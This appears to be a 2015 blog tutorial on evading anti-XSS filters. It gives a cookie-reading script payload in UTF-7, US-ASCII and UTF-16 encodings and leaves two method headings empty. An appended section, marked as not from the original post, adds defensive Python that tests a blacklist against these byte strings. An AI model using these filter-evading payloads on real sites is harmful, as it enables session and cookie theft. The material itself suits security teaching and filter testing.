Kartier Pohs

Friday, August 14, 2015

XSS WEB APPLICATION FILTERS BYPASS

Sometimes when we use an XSS payload in an input field or in a URL parameter, the attack vector fails because the website itself filters these kinds of malicious input. In that case we need to bypass the filters. Here is a list of methods that are useful for bypassing these types of filters.
Bypassing using Character Sets:-

Method 1 :-

Undesirability:- 

Method 2:-

In some situations, you can employ a powerful means of bypassing many types
of filters by causing the application to accept a nonstandard encoding of your
attack payload. The following examples show some representations of the string
<script>alert(document.cookie)</script> in alternative character sets:


UTF-7
+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-


US-ASCII
BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; ¼script¾alert(do
63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 BC 2F ; cument.cookie)¼/
73 63 72 69 70 74 BE ; script¾


UTF-16
FF FE 3C 00 73 00 63 00 72 00 69 00 70 00 74 00 ; ÿþ<.s.c.r.i.p.t.
3E 00 61 00 6C 00 65 00 72 00 74 00 28 00 64 00 ; >.a.l.e.r.t.(.d.
6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 2E 00 ; o.c.u.m.e.n.t...
63 00 6F 00 6F 00 6B 00 69 00 65 00 29 00 3C 00 ; c.o.o.k.i.e.).<.
2F 00 73 00 63 00 72 00 69 00 70 00 74 00 3E 00 ; /.s.c.r.i.p.t.>.

These encoded strings will bypass many common anti-XSS filters ;)
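An added example (not from the original post), seen from the filter's side: Python that rebuilds the three byte strings above, shows a byte-level `<script` blacklist missing all of them, and reports the charset under which each one becomes markup. The function names and the `Content-Type` check are illustrative assumptions.

```python
import codecs

MARKERS = ("<script", "</script")

# The three byte strings listed in the post, rebuilt here as test input.
SAMPLES = {
    "utf-7": b"+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-",
    "us-ascii": bytes.fromhex(
        "BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F"
        "63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 BC 2F"
        "73 63 72 69 70 74 BE"
    ),
    "utf-16": codecs.BOM_UTF16_LE
    + "<script>alert(document.cookie)</script>".encode("utf-16-le"),
}


def byte_filter_blocks(raw: bytes) -> bool:
    """Blacklist that matches the markers against the raw bytes only."""
    lowered = raw.lower()
    return any(m.encode("ascii") in lowered for m in MARKERS)


def interpretations(raw: bytes):
    """Yield (label, text) for each charset a browser could apply to raw."""
    for name in ("utf-8", "utf-7", "utf-16"):
        yield name, raw.decode(name, errors="replace")
    # 7-bit US-ASCII: the high bit is discarded, so 0xBC reads as '<'.
    yield "us-ascii", bytes(b & 0x7F for b in raw).decode("ascii")


def charsets_exposing_markup(raw: bytes) -> set:
    """Labels of the interpretations in which a marker becomes visible."""
    return {
        label
        for label, text in interpretations(raw)
        if any(m in text.lower() for m in MARKERS)
    }


def declares_charset(content_type: str) -> bool:
    """True when a Content-Type value pins the charset explicitly."""
    params = [p.strip().lower() for p in content_type.split(";")[1:]]
    return any(p.startswith("charset=") and len(p) > 8 for p in params)


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, byte_filter_blocks(raw), sorted(charsets_exposing_markup(raw)))
```

Each sample turns into markup under exactly one interpretation, so a filter has to inspect input in the charset the page will be served in, and a response that declares its charset (for example `text/html; charset=utf-8`) leaves the browser nothing to guess.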


Copyright 2015 @ Yogesh Prasad